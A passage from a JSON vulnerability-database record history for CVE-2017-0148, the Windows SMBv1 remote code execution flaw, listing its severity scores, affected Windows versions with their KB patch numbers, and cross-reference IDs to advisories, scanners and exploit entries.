Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T14:58:45", "differentElements": ["msAffectedSoftware"], "edition": 73}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-21T08:57:08", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T14:58:45", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T14:58:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012215", "KB3177186", "KBMS16-110, 3187754", "KB3205409", "KB3210720", "KB3213986", "KB3205401", "KB4013198", "KB4012598", "KB4012212", "KB3212646", "KB3210721", "KB4012217", "KB4012606", "KB4012214", "KB4012216", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T08:57:08", "differentElements": ["msAffectedSoftware"], "edition": 74}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-21T10:46:37", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-21T10:46:37", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-21T10:46:37", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KBMS16-110, 3187754", "KB4013198", "KB3210721", "KB4012214", "KB4012217", "KB4013429", "KB3213986", "KB4012212", "KB4012606", "KB4012216", "KB3210720", "KB3177186", "KB3205409", "KB3212646", "KB3205401", "KB4012598", "KB4012215"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T10:46:37", "differentElements": ["msAffectedSoftware"], "edition": 75}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-25T23:09:38", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 